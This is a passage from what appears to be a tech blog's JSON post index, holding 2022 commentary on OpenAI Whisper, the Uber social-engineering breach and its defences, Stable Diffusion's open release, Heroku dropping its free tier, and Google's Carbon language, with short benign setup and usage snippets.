signals about the kernel’s evolution.","title":"Linux 6.0 Lands — A Milestone That's Less About the Number","type":"posts"},{"content":"OpenAI just did something unexpected: they open-sourced a genuinely excellent speech recognition model. Whisper is a general-purpose speech recognition system trained on 680,000 hours of multilingual and multitask supervised data collected from the web. 
And unlike some \u0026ldquo;open\u0026rdquo; AI releases that come with asterisks, this one ships with full model weights, inference code, and a permissive MIT license.\nAfter watching OpenAI keep DALL-E 2 and GPT-3 firmly behind API walls, Whisper\u0026rsquo;s open release caught me off guard. Having spent the past few days putting it through its paces, I can say this: it\u0026rsquo;s the real deal. For many practical use cases, Whisper performs at a level that makes commercial speech-to-text APIs nervous.\nThe Technical Architecture # Whisper is an encoder-decoder Transformer trained as a multitask model. It handles English and multilingual speech recognition, speech translation, spoken language identification, and voice activity detection — all from a single model. The architecture itself isn\u0026rsquo;t revolutionary; it\u0026rsquo;s a fairly standard Transformer applied to log-Mel spectrograms of audio input. What\u0026rsquo;s remarkable is the scale and quality of training.\nThe model comes in several sizes, from \u0026ldquo;tiny\u0026rdquo; (39M parameters) to \u0026ldquo;large\u0026rdquo; (1.55B parameters):\nModel Parameters English-only Multilingual Required VRAM tiny 39M ✓ ✓ ~1 GB base 74M ✓ ✓ ~1 GB small 244M ✓ ✓ ~2 GB medium 769M ✓ ✓ ~5 GB large 1550M ✗ ✓ ~10 GB The \u0026ldquo;small\u0026rdquo; and \u0026ldquo;medium\u0026rdquo; models hit a sweet spot for most applications — good accuracy without demanding a high-end GPU. 
I\u0026rsquo;ve been running the medium model on a modest workstation GPU, and the results are consistently impressive.\nInstallation is straightforward:\npip install git+https://github.com/openai/whisper.git And usage is remarkably simple:\nimport whisper model = whisper.load_model(\u0026#34;medium\u0026#34;) result = model.transcribe(\u0026#34;meeting_recording.mp3\u0026#34;) print(result[\u0026#34;text\u0026#34;]) Three lines of code for transcription that handles accents, background noise, and multiple speakers better than most commercial solutions I\u0026rsquo;ve used.\nWhere Whisper Shines # I\u0026rsquo;ve tested Whisper against several scenarios that typically trip up speech recognition systems, and the results are notable:\nAccented English: As a Dutchman who\u0026rsquo;s worked internationally for decades, I\u0026rsquo;m acutely aware of how badly most speech recognition handles non-native English speakers. Whisper handles Dutch-accented English, Indian English, and various European accents with significantly fewer errors than Google\u0026rsquo;s Speech-to-Text API in my informal testing.\nTechnical content: Transcribing developer conference talks — where speakers reference API names, programming terms, and acronyms — has always been a pain point. Whisper handles this better than expected, though it still stumbles on very domain-specific terminology.\nNoisy environments: Meeting recordings with background chatter, typing sounds, and air conditioning noise come through cleanly. The model\u0026rsquo;s robustness to noise is a clear benefit of training on web-scraped audio, which includes plenty of imperfect recordings.\nMultilingual content: The model handles code-switching — speakers who mix languages mid-sentence — remarkably well. 
For international teams, this is a significant practical advantage.\nWhat It Means for Developers # The immediate applications are obvious: meeting transcription, podcast indexing, accessibility features, voice interfaces, content moderation for audio platforms. But I think the more interesting implications are in the second-order effects.\nFirst, the cost equation changes dramatically. Cloud speech-to-text APIs charge per minute of audio. Running Whisper locally makes the marginal cost essentially zero after the initial hardware investment. For applications processing large volumes of audio — think podcast platforms, call centres, or media archives — this is transformative.\nSecond, privacy-sensitive transcription becomes feasible. Medical dictation, legal proceedings, confidential meetings — any context where sending audio to a third-party API raises compliance concerns can now be handled on-premises. I\u0026rsquo;ve spoken with teams in healthcare and legal sectors who have been waiting for exactly this capability.\nThird, the building blocks for more complex pipelines are now open. Combine Whisper with a language model for summarisation, with a translation model for localisation, or with a speaker diarisation system for meeting minutes. The composability of open models is where the real value compounds.\nThe Broader Pattern # Whisper\u0026rsquo;s release continues an interesting trend. Stability AI open-sourced Stable Diffusion a few weeks ago. Meta released OPT and subsequently other language models, continuing the open-weight momentum. The AI landscape is bifurcating between proprietary API-first approaches and open-weight community-driven development.\nAs someone who cut their teeth on open-source culture in the 1990s, this split feels familiar. The same tensions between open and proprietary that played out with operating systems, databases, and web frameworks are now playing out with AI models. 
And if history is any guide, the open approach will generate more innovation, even if proprietary systems maintain quality advantages in certain areas.\nWhat\u0026rsquo;s particularly smart about OpenAI\u0026rsquo;s move here is that Whisper is complementary to their commercial products rather than competitive with them. Open-sourcing speech recognition builds goodwill and ecosystem while their revenue drivers — GPT-3 API access, DALL-E — remain proprietary. It\u0026rsquo;s a calculated move, but a welcome one.\nMy Take # Whisper is one of those releases that immediately goes into my standard toolkit. The accuracy-to-effort ratio is exceptional. I\u0026rsquo;ve already integrated it into a personal workflow for transcribing conference talks and technical podcasts into searchable text, and I\u0026rsquo;m exploring its use for automated meeting notes.\nIf you work with audio in any capacity, set aside an afternoon to experiment with Whisper. Start with the \u0026ldquo;small\u0026rdquo; model for quick iteration, move to \u0026ldquo;medium\u0026rdquo; for production quality, and test against your specific use cases. The gap between this and what was freely available even six months ago is remarkable.\nThe age of \u0026ldquo;good enough\u0026rdquo; open-source AI models is arriving faster than most of us expected. 
Whisper won\u0026rsquo;t be the last model to make us rethink our architecture decisions, and that\u0026rsquo;s exactly the kind of disruption our industry needs.\n","date":"22 September 2022","externalUrl":null,"permalink":"/posts/220922-openai-whisper-speech-recognition/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI open-sources Whisper, a speech recognition model trained on 680,000 hours of data that approaches human-level accuracy across multiple languages.","title":"OpenAI Whisper — Open Source Speech Recognition That Actually Works","type":"posts"},{"content":"Today, Uber disclosed that an attacker gained broad access to their internal systems — Slack, Google Workspace, AWS consoles, HackerOne vulnerability reports, and more. The initial reports suggest it was an 18-year-old who got in through social engineering. Not a sophisticated zero-day exploit. Not a state-sponsored attack chain. A teenager with patience and a messaging app.\nThis should scare every engineering leader reading this. Not because Uber is uniquely bad at security — they\u0026rsquo;ve invested heavily since their 2016 breach — but because the attack vector exploits assumptions that most of us are making right now. 
Social engineering and MFA attacks have become increasingly common across the industry.\nHow It Happened # Based on what\u0026rsquo;s been reported so far, the attack chain went roughly like this:\nThe attacker obtained credentials for an Uber contractor, possibly through a dark web marketplace or prior phishing campaign The contractor had multi-factor authentication (MFA) enabled The attacker repeatedly triggered MFA push notifications — a technique known as \u0026ldquo;MFA fatigue\u0026rdquo; or \u0026ldquo;MFA bombing\u0026rdquo; After being bombarded with authentication prompts, the contractor eventually approved one (the attacker also reportedly contacted them on WhatsApp, posing as Uber IT) Once inside the VPN, the attacker found a PowerShell script on a network share containing hardcoded admin credentials for Uber\u0026rsquo;s Privileged Access Management (PAM) system Game over. Those PAM credentials unlocked access to virtually everything The screenshots the attacker posted to Uber\u0026rsquo;s internal Slack channels are almost comical in their breadth of access. AWS console, vSphere admin, Google Workspace admin, SentinelOne security dashboard — the attacker had the keys to the kingdom.\nMFA Fatigue Is a Real Problem # Let\u0026rsquo;s talk about step 3, because this is where most security architectures are failing. Push-based MFA — where you tap \u0026ldquo;Approve\u0026rdquo; on your phone — was supposed to be the reasonable middle ground between security and usability. And for years, it worked well enough.\nBut MFA fatigue attacks exploit a fundamental UX problem: if you send someone enough push notifications at 3 AM, eventually they\u0026rsquo;ll tap \u0026ldquo;Approve\u0026rdquo; just to make it stop. It\u0026rsquo;s the authentication equivalent of alarm fatigue in hospitals, and it\u0026rsquo;s just as dangerous. 
This is a predictable human factor in security design.\nThe mitigations exist but aren\u0026rsquo;t widely deployed:\nNumber matching: the authentication prompt shows a number that the user must enter, rather than just tapping \u0026ldquo;Approve\u0026rdquo; Rate limiting: blocking excessive MFA requests and alerting security teams FIDO2/WebAuthn: phishing-resistant hardware tokens that can\u0026rsquo;t be socially engineered Contextual signals: denying authentication attempts from unusual locations or devices Microsoft has been pushing number matching for Azure AD, and Duo has added similar features. But how many organisations have actually enabled these? In my experience consulting across the industry, the answer is \u0026ldquo;not nearly enough.\u0026rdquo;\nThe Hardcoded Credentials Problem # Step 5 is the one that really makes me wince. Hardcoded credentials in a PowerShell script on a network share. In 2022. At a company that employs thousands of engineers and has a dedicated security team.\nBefore anyone gets smug about this, I\u0026rsquo;d ask: have you audited every script, configuration file, and internal wiki in your organisation? I\u0026rsquo;ve been in this industry for thirty years, and I guarantee that virtually every company of sufficient size has credentials hiding in places they shouldn\u0026rsquo;t be. It\u0026rsquo;s not a matter of policy — every company has policies against this. It\u0026rsquo;s a matter of enforcement and tooling.\nThis is where secrets management platforms like HashiCorp Vault, AWS Secrets Manager, or Azure Key Vault earn their keep. But deploying them is only half the battle. 
You also need:\nAutomated scanning for secrets in code repositories (tools like truffleHog or GitLeaks) Regular audits of shared drives and internal resources Just-in-time privilege escalation rather than standing admin credentials Network segmentation that limits lateral movement even after initial compromise Zero Trust Isn\u0026rsquo;t Just a Buzzword # The Uber breach is a textbook argument for zero trust architecture — and I say that as someone who\u0026rsquo;s usually sceptical of security marketing terms. The core principle is straightforward: don\u0026rsquo;t trust anything inside your network perimeter any more than you trust things outside it. This principle is increasingly critical as the shift to distributed work makes traditional network perimeters obsolete.\nIn Uber\u0026rsquo;s case, once the attacker was past the VPN, they had remarkably free lateral movement. A zero trust approach would have required continuous verification at each system boundary, limited the blast radius of compromised credentials, and made it much harder to pivot from a contractor VPN session to AWS admin access.\nThe practical implementation looks like:\nMicrosegmentation of network resources Per-application authentication rather than VPN-grants-everything Continuous device health verification Least-privilege access with time-limited elevation Comprehensive logging and anomaly detection at every layer My Take # Every security incident teaches us something, and the lesson from Uber\u0026rsquo;s breach isn\u0026rsquo;t new — but it\u0026rsquo;s one we keep failing to learn. Defence in depth isn\u0026rsquo;t optional. MFA is necessary but not sufficient. And the biggest vulnerabilities in most organisations aren\u0026rsquo;t technical — they\u0026rsquo;re the gap between security policy and actual implementation.\nI\u0026rsquo;ll be watching closely as more details emerge about this breach. 
But if you\u0026rsquo;re an engineering leader reading this today, here\u0026rsquo;s what I\u0026rsquo;d do right now:\nAudit your MFA implementation. If you\u0026rsquo;re using simple push notifications without number matching, you\u0026rsquo;re vulnerable to fatigue attacks. Upgrade or add compensating controls. Run a secrets scan. Today. Not next quarter. Use automated tools to sweep your repositories, shared drives, and internal wikis. Review your PAM configuration. Standing admin credentials accessible from general network shares is an unacceptable risk. Test your lateral movement controls. Red team your own network — can a compromised VPN session reach your crown jewels? Security isn\u0026rsquo;t a product you buy. It\u0026rsquo;s a practice you maintain. And days like today are uncomfortable reminders of what happens when the practice slips.\n","date":"15 September 2022","externalUrl":null,"permalink":"/posts/220915-uber-breach-social-engineering/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A teenager allegedly breached Uber’s internal systems through social engineering and MFA fatigue, exposing fundamental weaknesses in how we think about authentication.","title":"The Uber Breach — When MFA Isn't Enough","type":"posts"},{"content":"In the span of just a few weeks, the AI landscape has shifted dramatically. Stability AI released Stable Diffusion as an open-source model, and the developer community has responded with an intensity I haven\u0026rsquo;t seen since the early days of Linux. Within days of the release, people were running state-of-the-art image generation on consumer GPUs, building applications, creating art, and — importantly — dissecting the model\u0026rsquo;s architecture to understand what makes it tick.\nAfter thirty years of watching open-source movements reshape technology, I can tell you: this one feels different. We\u0026rsquo;re not talking about a database engine or a web framework. 
We\u0026rsquo;re talking about a model that generates photorealistic images from text prompts, running on hardware you probably already own.\nWhat Stable Diffusion Actually Is # For those who haven\u0026rsquo;t dived in yet, Stable Diffusion is a latent diffusion model trained on the LAION-5B dataset. Unlike DALL-E 2 or Midjourney, which remain locked behind APIs and waitlists, Stable Diffusion ships with full model weights. You can download it, run it locally, fine-tune it on your own data, and integrate it into your applications without asking anyone\u0026rsquo;s permission.\nThe technical achievement here is significant. The model operates in a compressed latent space rather than pixel space directly, which is what makes it feasible to run on a GPU with 8GB of VRAM. The architecture combines a variational autoencoder, a U-Net backbone for the diffusion process, and a CLIP text encoder. If you\u0026rsquo;ve been following the diffusion model literature, this is a masterful engineering exercise in making cutting-edge research practical.\nWhat strikes me most is how quickly the community has started optimizing. Within the first week, we saw implementations that reduced memory requirements, sped up inference with various sampling strategies, and even got the model running on Apple Silicon via Core ML conversions. The pace of community innovation around an open model dwarfs what any single company could achieve behind closed doors.\nThe Developer Ecosystem Is Exploding # The real story isn\u0026rsquo;t just the model — it\u0026rsquo;s what developers are building on top of it. I\u0026rsquo;ve been watching GitHub like a hawk this past week, and the number of projects spawning around Stable Diffusion is staggering.\nAutomatic1111\u0026rsquo;s web UI has already become the de facto interface for local usage, offering features like inpainting, outpainting, and batch processing that rival commercial tools. 
There are img2img pipelines, textual inversion experiments for teaching the model new concepts from just a handful of images, and integrations with tools like Blender and Photoshop.\nFrom a software engineering perspective, this is a fascinating case study in how quickly open-source ecosystems form. The model was released on August 22, and we already have a rich tooling layer, documentation efforts, and specialised fine-tuning workflows. The Python ecosystem, particularly the Hugging Face diffusers library, has made it trivially easy to integrate the model into existing applications with just a few lines of code.\nfrom diffusers import StableDiffusionPipeline\npipe = StableDiffusionPipeline.from_pretrained(\u0026#34;CompVis/stable-diffusion-v1-4\u0026#34;)\npipe = pipe.to(\u0026#34;cuda\u0026#34;)\nimage = pipe(\u0026#34;a photo of an astronaut riding a horse\u0026#34;).images[0]\nimage.save(\u0026#34;astronaut.png\u0026#34;)\nThat\u0026rsquo;s it. Five lines to generate an image that would have been science fiction two years ago.\nThe Open Source Debate # Not everyone is celebrating, and I think the concerns deserve serious attention. When you open-source a model this powerful, you lose control over how it\u0026rsquo;s used. There are legitimate concerns about deepfakes, non-consensual imagery, and the potential for misuse that closed APIs can at least attempt to moderate.\nStability AI has included a CreativeML Open RAIL-M license that prohibits certain harmful uses, but enforcement of license terms on an open model is essentially an honour system. This is a genuinely hard problem, and I don\u0026rsquo;t think the industry has good answers yet.\nThat said, I come down firmly on the side of open release. My experience over three decades in tech has consistently shown that keeping powerful technology locked away doesn\u0026rsquo;t prevent misuse; it just concentrates the power in fewer hands.
Open models allow researchers, ethicists, and the broader community to study, audit, and develop mitigations. You can\u0026rsquo;t fix what you can\u0026rsquo;t see.\nThe parallel to cryptography is instructive. We went through this exact debate in the 1990s with the crypto wars, and the consensus that emerged — that open, auditable systems are more trustworthy than closed ones — applies equally here.\nImplications for Software Teams # If you lead a development team, you should be paying attention right now. Generative image AI is about to become a standard capability that applications can incorporate. The barriers to entry have collapsed from \u0026ldquo;negotiate an enterprise API contract\u0026rdquo; to \u0026ldquo;pip install.\u0026rdquo;\nI\u0026rsquo;d recommend setting up a local Stable Diffusion instance and experimenting. Understand the capabilities and limitations firsthand. Think about where generated imagery could enhance your product — whether that\u0026rsquo;s placeholder content, dynamic illustrations, design prototyping, or something entirely novel.\nThe inference costs are also worth noting. Running the model locally means zero per-image API costs. For applications that need to generate images at scale, this changes the economics completely.\nMy Take # We\u0026rsquo;re at an inflection point. The open release of Stable Diffusion isn\u0026rsquo;t just a product launch — it\u0026rsquo;s a philosophical statement about how AI development should work. And judging by the community response, it\u0026rsquo;s a statement that resonates.\nI\u0026rsquo;ve been building software since before the web existed, and every few years something comes along that makes me sit up and rethink assumptions. Stable Diffusion is one of those moments. 
Not because the technology is perfect — it isn\u0026rsquo;t — but because the model of open, democratised access to powerful AI tools feels like it could define the next era of software development.\nThe genie is well and truly out of the bottle. What the community builds next will be fascinating to watch.\n","date":"8 September 2022","externalUrl":null,"permalink":"/posts/220908-stable-diffusion-open-source-ai/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Stability AI’s open release of Stable Diffusion marks a watershed moment for generative AI, putting powerful image generation in the hands of every developer.","title":"Stable Diffusion Goes Open Source — And Changes Everything","type":"posts"},{"content":"Last week, Salesforce-owned Heroku announced that they\u0026rsquo;re eliminating free dynos, free Heroku Postgres, and free Heroku Data for Redis, effective November 28, 2022. After years of being the go-to \u0026ldquo;just push and deploy\u0026rdquo; platform for students, hobbyists, and early-stage projects, Heroku\u0026rsquo;s free tier is going away.\nI\u0026rsquo;m not going to pretend this is surprising — the writing has been on the wall since Salesforce acquired Heroku in 2010, and the platform has felt increasingly neglected in recent years. But the impact on the developer ecosystem is real, and it\u0026rsquo;s worth examining what we\u0026rsquo;re losing and where we go from here.\nWhat Heroku\u0026rsquo;s Free Tier Actually Meant # For an entire generation of developers, Heroku was the first place they deployed something to the internet. The experience was magical — git push heroku main and your app was live. No SSH, no server configuration, no nginx config files, no Docker, no Kubernetes. 
Just code to URL in seconds.\nI\u0026rsquo;ve recommended Heroku\u0026rsquo;s free tier countless times over the years — to bootcamp students deploying their first Express app, to developers prototyping APIs for hackathons, to hobbyists running small Discord bots. The free dyno with its 30-minute sleep timer wasn\u0026rsquo;t powerful, but it was enough to learn, experiment, and ship.\nThe educational impact is hard to overstate. Platforms like freeCodeCamp, The Odin Project, and countless university courses built their deployment tutorials around Heroku. Every full-stack bootcamp graduate in the last decade probably has a Heroku app in their portfolio. That entire ecosystem now needs to update its curriculum.\nWhy This Happened # Heroku cites the need to focus on \u0026ldquo;mission-critical\u0026rdquo; customer needs and reducing fraud/abuse on the platform. The abuse angle is legitimate — free tiers inevitably attract crypto miners, spam operations, and bot armies. Heroku reportedly spent significant resources combating abuse of free resources, and the security incident earlier this year (where OAuth tokens were stolen from their GitHub integration) likely accelerated the decision to simplify the platform.\nBut let\u0026rsquo;s be honest about the bigger picture: Heroku stopped innovating years ago. The platform hasn\u0026rsquo;t had a meaningful new feature in ages. The container runtime is dated. Native support for newer runtimes and frameworks lags behind competitors. The dashboard feels like it\u0026rsquo;s from 2015. While competitors like Vercel, Railway, Fly.io, and Render have been shipping features at a frenetic pace, Heroku has been coasting on brand recognition and inertia.\nSalesforce has never seemed to know what to do with Heroku. It\u0026rsquo;s not a CRM, it\u0026rsquo;s not enterprise software, and the developer-first philosophy that made Heroku special doesn\u0026rsquo;t align naturally with Salesforce\u0026rsquo;s enterprise sales model. 
The death of the free tier feels like another step toward Heroku becoming a purely enterprise platform — functional, but not the place where developers want to be.\nThe Alternatives Landscape # The good news is that 2022 has far more PaaS options than when Heroku was the only game in town. Here\u0026rsquo;s where I see developers migrating:\nRailway — The closest spiritual successor to Heroku\u0026rsquo;s developer experience. Git-push deploys, automatic database provisioning, a generous free tier (for now). The DX is excellent and they\u0026rsquo;re iterating fast.\nRender — A solid Heroku alternative with free static sites and web services (with sleep, like Heroku\u0026rsquo;s old free dyno). Managed databases, auto-deploy from Git, and a clean interface.\nFly.io — More powerful but slightly more complex. Runs Docker containers on edge infrastructure worldwide. Their free allowance is generous, and the performance is excellent. Good for developers ready to graduate from the simplest PaaS.\nVercel / Netlify — If your project is a frontend app or serverless functions, these remain the best options with generous free tiers. Not a full Heroku replacement, but covers many common use cases.\nDeta — Free cloud for personal projects, with a focus on developer experience. Less mature but worth watching.\nFor database hosting specifically, Supabase (PostgreSQL), PlanetScale (MySQL), and MongoDB Atlas all offer free tiers that are more generous than what Heroku Postgres provided.\nWhat This Means for the Industry # Heroku\u0026rsquo;s retreat from the free tier reflects a broader tension in the cloud platform market. Free tiers are expensive to operate and attract abuse, but they\u0026rsquo;re also the top of the funnel for developer adoption. 
Every major cloud provider — AWS, GCP, Azure — offers free tiers specifically because getting developers hooked early pays off over their career.\nThe companies replacing Heroku in the free tier space are VC-funded startups burning capital to acquire users. Railway, Render, and Fly.io are all venture-backed, and their free tiers are subsidized by investor money. The cynical view is that we\u0026rsquo;ll see the same pattern repeat — generous free tiers that shrink or disappear once the companies need to show profitability.\nThe sustainable alternative might be that deployment becomes so commoditized that free tiers are just table stakes, the way free email became table stakes for Google and Microsoft. But we\u0026rsquo;re not there yet.\nMy Take # The Heroku free tier was a public good for the developer community, and its loss is genuinely sad. But I\u0026rsquo;d argue the bigger loss happened years ago, when Heroku stopped being the innovative platform that it was in its early days.\nIf you\u0026rsquo;re a developer with projects on Heroku\u0026rsquo;s free tier, start migrating now. Don\u0026rsquo;t wait until November. Railway and Render are the smoothest transitions if you want a similar experience. If you\u0026rsquo;re comfortable with containers, Fly.io gives you more power and flexibility.\nFor educators and bootcamp operators: update your deployment tutorials. This is an opportunity to teach students about the broader cloud ecosystem rather than defaulting to one platform. Show them Railway for simplicity, Docker for understanding what\u0026rsquo;s happening underneath, and maybe even a basic VPS setup so they understand what PaaS platforms abstract away.\nThe era of git push heroku as the universal first deployment experience is ending. What replaces it will probably be better — there are more options, more competition, and better technology. 
But there was something special about that simplicity, and I hope at least one of the new players can preserve it.\n","date":"1 September 2022","externalUrl":null,"permalink":"/posts/220901-heroku-ending-free-tier/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Heroku’s decision to eliminate free dynos and databases marks the end of an era. Where do developers go now for easy, free deployment?","title":"Heroku Kills the Free Tier — End of an Era for Developer Onboarding","type":"posts"},{"content":"This week, Stability AI publicly released Stable Diffusion — and the AI landscape just shifted in a way that\u0026rsquo;s going to take months to fully understand. Unlike DALL-E 2 (behind OpenAI\u0026rsquo;s API and waitlist) or Midjourney (accessible through Discord), Stable Diffusion is open source, downloadable, and runnable on consumer hardware. Anyone with a decent GPU and some Python knowledge can now generate images from text prompts locally, with no API calls, no usage limits, and no content filters.\nI\u0026rsquo;ve been tinkering with it since the weights dropped, and I\u0026rsquo;ll be honest — the speed at which this technology has gone from research paper to \u0026ldquo;runs on my workstation\u0026rdquo; is staggering.\nWhat Makes Stable Diffusion Different # The technical architecture builds on latent diffusion models, as described in the paper by Rombach et al. from LMU Munich and Runway. Instead of operating in pixel space (which is computationally expensive), the model works in a compressed latent space, dramatically reducing the compute requirements while maintaining output quality.\nThe practical result: you can generate 512×512 images in seconds on a consumer GPU with 8GB+ VRAM. Compare this to DALL-E 2, which requires massive cloud infrastructure and costs money per generation. The democratization angle here is significant — this isn\u0026rsquo;t a gated API or a subscription service. 
It\u0026rsquo;s a model checkpoint file and a Python script.\nThe model was trained on a subset of LAION-5B, one of the largest publicly available image-text datasets. This open training data provenance is important: it means researchers can study, audit, and understand what the model learned, unlike proprietary models where the training data is a black box.\nFrom a technical standpoint, the architecture combines:\nA variational autoencoder (VAE) for image compression/decompression\nA U-Net for the denoising diffusion process in latent space\nA CLIP text encoder for conditioning on text prompts\nA scheduler that controls the denoising steps\nRunning It Locally: The Developer Experience # Getting Stable Diffusion running is surprisingly straightforward if you\u0026rsquo;re comfortable with Python environments. Clone the repo, install dependencies, download the model weights, and you\u0026rsquo;re generating images. The community has already started building optimized inference scripts and web UIs.\nconda create -n ldm python=3.8\nconda activate ldm\npip install -r requirements.txt\npython scripts/txt2img.py --prompt \u0026#34;a photograph of an astronaut riding a horse\u0026#34; \\\n  --plms --n_samples 1 --n_iter 1\nWhat\u0026rsquo;s particularly impressive is how quickly the community has optimized memory usage. Within days of release, people have gotten it running on GPUs with as little as 4GB VRAM through techniques like attention slicing and float16 precision. There are already forks targeting Apple Silicon Macs, AMD GPUs, and even CPU-only inference (slow, but functional).\nThe model also supports image-to-image generation, inpainting, and various conditioning techniques.
Combined with the open weights, this means developers can fine-tune the model on specific domains — architectural visualization, game asset generation, medical imaging, you name it.\nThe Implications for Software Development # As a developer, I\u0026rsquo;m already thinking about the practical applications beyond \u0026ldquo;making pretty pictures.\u0026rdquo; Image generation as a tool in the development pipeline opens up interesting possibilities:\nPrototyping and design: Generate placeholder images, UI mockups, or concept art during early development phases. Instead of hunting through stock photo sites, describe what you need.\nData augmentation: For teams building computer vision systems, synthetic data generation could supplement real training data. Need 10,000 images of defective widgets for a quality control model? This might get you partway there.\nContent systems: Any platform that needs images — blogs, documentation, marketing — could integrate text-to-image generation. The quality isn\u0026rsquo;t always perfect, but for many use cases it\u0026rsquo;s good enough.\nGame development: Texture generation, concept art iteration, background creation. The indie game dev community is already experimenting heavily with this.\nThe API integration angle is also worth noting. While you can run this locally, services are already spinning up to offer Stable Diffusion as an API. For developers who don\u0026rsquo;t want to manage GPU infrastructure, this will become just another API call — but one that\u0026rsquo;s backed by an open model you could self-host if needed.\nThe Hard Questions # Let\u0026rsquo;s not pretend this is all upside. The open release of Stable Diffusion raises serious questions that the tech community needs to grapple with:\nCopyright and training data: The model was trained on images scraped from the internet, many of which are copyrighted. 
Artists are understandably concerned about their work being used to train a system that can now replicate their styles. The legal landscape mirrors broader governance questions around AI training and data rights that regulators are grappling with.\nMisuse potential: Unlike DALL-E 2 with its content filters, Stable Diffusion runs locally with no restrictions. Deepfakes, non-consensual imagery, and other harmful content are real concerns. The open-source nature means you can\u0026rsquo;t put this genie back in the bottle.\nEconomic disruption: Stock photographers, illustrators, concept artists — entire creative professions are going to be impacted. Not eliminated overnight, but the economics of visual content creation are changing fast.\nThese aren\u0026rsquo;t reasons to suppress the technology, but they\u0026rsquo;re reasons to take the societal implications seriously rather than just celebrating the technical achievement.\nMy Take # Stable Diffusion is the most significant open-source AI release since the original transformer papers. Not because the technology is fundamentally new — the underlying research has been public for months — but because the combination of quality, accessibility, and openness hits a tipping point. This democratization of AI capabilities contrasts with proprietary approaches and represents a crucial fork in how the ecosystem develops.\nI\u0026rsquo;ve seen the trajectory of AI capabilities accelerate dramatically over the past few years, but this feels different. When you put state-of-the-art capabilities directly in developers\u0026rsquo; hands, without gatekeepers, innovation happens at a pace that centralized services can\u0026rsquo;t match. The community contributions in the first 48 hours alone — optimization patches, alternative UIs, fine-tuning scripts — demonstrate this.\nFor developers, my advice is simple: experiment with this now. Understand the capabilities and limitations firsthand. 
Whether you\u0026rsquo;re building products that could integrate image generation or just trying to understand where AI is heading, Stable Diffusion is the most accessible way to get hands-on experience with the current state of the art.\nWe\u0026rsquo;re going to look back at this moment as a turning point. The question is what we build with it.\n","date":"25 August 2022","externalUrl":null,"permalink":"/posts/220825-stable-diffusion-open-source-ai-art/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Stability AI releases Stable Diffusion as open source, putting state-of-the-art image generation in the hands of anyone with a GPU. The implications are enormous.","title":"Stable Diffusion Goes Public — Open Source AI Image Generation Changes Everything","type":"posts"},{"content":"A few weeks ago at CppNorth, Google engineer Chandler Carruth unveiled Carbon — an experimental programming language positioned as a \u0026ldquo;successor to C++.\u0026rdquo; The announcement generated enormous buzz, GitHub stars piled up overnight, and the inevitable hot takes followed. Now that the dust has settled a bit, I think it\u0026rsquo;s worth looking at this with clear eyes.\nThe pitch is straightforward: C++ has decades of accumulated complexity, backward compatibility constraints make modernization painful, and the committee process moves slowly. Carbon aims to provide a modern language that can interoperate with existing C++ code, similar to how Kotlin relates to Java or Swift relates to Objective-C. Migrate incrementally, don\u0026rsquo;t rewrite from scratch.\nThe Interoperability Argument # The strongest part of Carbon\u0026rsquo;s value proposition is C++ interoperability. There are billions of lines of C++ in production — game engines, operating systems, embedded systems, financial trading platforms, browsers. 
Rewriting that code in Rust or any other language is a multi-year, multi-team effort that most organizations can\u0026rsquo;t justify.\nCarbon proposes bidirectional interop: call Carbon from C++ and C++ from Carbon, with automatic bridging of types and functions. If they can deliver on this promise, it addresses a genuine gap. Rust\u0026rsquo;s C++ interop story, while improving through projects like cxx, still requires significant manual bridging work and doesn\u0026rsquo;t support calling Rust from C++ as seamlessly as the other direction.\nThe question is whether this interop can actually work at the level of fidelity needed. C++ has templates, multiple inheritance, implicit conversions, overload resolution rules that fill hundreds of pages in the standard — faithfully bridging all of this is a herculean task. The Carbon team acknowledges this and is focusing on practical interop patterns rather than trying to support every dark corner of C++.\nHow Carbon Compares to Rust # This is the comparison everyone\u0026rsquo;s making, and it\u0026rsquo;s worth addressing directly. Rust and Carbon occupy similar spaces — systems programming languages designed to be safer than C++ — but they make fundamentally different trade-offs.\nRust chose to break from C/C++ compatibility entirely and build a new ecosystem from scratch. The result is a language with powerful safety guarantees (the borrow checker, ownership model) but a higher migration cost. You can\u0026rsquo;t incrementally port a C++ codebase to Rust; you effectively need to rewrite modules and maintain FFI boundaries.\nCarbon is betting that interoperability matters more than maximum safety innovation. It provides generics instead of templates, pattern matching, a cleaner syntax, and memory safety improvements — but it doesn\u0026rsquo;t go as far as Rust\u0026rsquo;s ownership model. 
The reasoning is that asking C++ developers to adopt a fundamentally different mental model is too high a barrier.\nFrom what I\u0026rsquo;ve seen of the early design documents, Carbon\u0026rsquo;s approach to generics is particularly interesting. Instead of C++ templates (which are essentially duck-typed compile-time macros), Carbon uses checked generics similar to Rust traits or Haskell typeclasses. This alone would eliminate a massive category of inscrutable template error messages.\nThe Elephant in the Room: It\u0026rsquo;s From Google # Let\u0026rsquo;s talk about the Google factor. The company has a well-documented history of abandoning projects — the \u0026ldquo;Google Graveyard\u0026rdquo; is a running joke in the industry. For a programming language that\u0026rsquo;s asking for long-term investment from developers and organizations, this track record matters.\nCarbon is currently marked as experimental, with no production-ready compiler. The team is transparent about this being a 5-10 year journey, and they\u0026rsquo;re building it as an open-source community project rather than a purely internal Google effort. The governance model they\u0026rsquo;ve proposed attempts to prevent single-company control.\nBut we\u0026rsquo;ve seen this before. Dart was supposed to replace JavaScript in the browser — it found its niche with Flutter but never achieved its original ambition. Go succeeded spectacularly, but Go was also production-ready when it launched and had clear, immediate use cases. Carbon is asking people to invest in a vision that won\u0026rsquo;t materialize for years.\nDoes the C++ Ecosystem Actually Want This? # There\u0026rsquo;s a deeper question here: does the C++ community want a successor language, or do they want C++ to evolve faster? The C++20 and C++23 standards have brought significant modernization — concepts, coroutines, modules, ranges. 
